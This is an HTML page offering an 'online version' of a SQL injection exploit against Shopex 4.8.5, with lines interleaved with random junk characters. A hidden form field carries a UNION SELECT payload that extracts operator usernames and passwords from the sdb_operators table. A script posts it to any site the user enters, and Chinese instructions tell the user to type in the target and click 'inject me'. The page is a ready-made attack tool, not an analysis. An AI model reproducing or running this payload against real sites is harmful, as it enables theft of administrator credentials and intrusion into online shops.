<center>
1 B4 i0 L+ E: s8 Q2 A" q8 K<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>2 X0 @3 E8 ~" J! G! E+ J, b# H: u
<form action="" method="post" name="submit_url">
" N( M- v4 H# e2 s5 T+ B网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>, j/ @1 P2 B3 { O+ z
<input type="hidden" name="goods[goods_id]" value="3">" ~! ~+ T0 @) _
<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
1 c6 H7 K Y+ x( h<input type="submit" value="给我注入" onclick=fsubmit()>
9 a2 V& W3 W! ^</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
# `( o0 z( M0 V" a4 L2 q% t8 |
0 R5 F9 s7 T5 t$ d+ G<script>
- \$ r$ O# ?1 e; s% Efunction fsubmit(){ 6 W4 ?- }5 x3 ^8 z6 S- G
form = document.forms[0]; ; V, Y7 ~; J' l/ U; ?( S2 V
form.action = form.url.value+'/?product-gnotify';
9 P7 w0 M8 L( D* d0 qform.submit(); e f5 R, f m6 B7 w
} 8 j& Q, v* i" f/ j9 O
</script>
/ i% {8 x; T* C f8 i |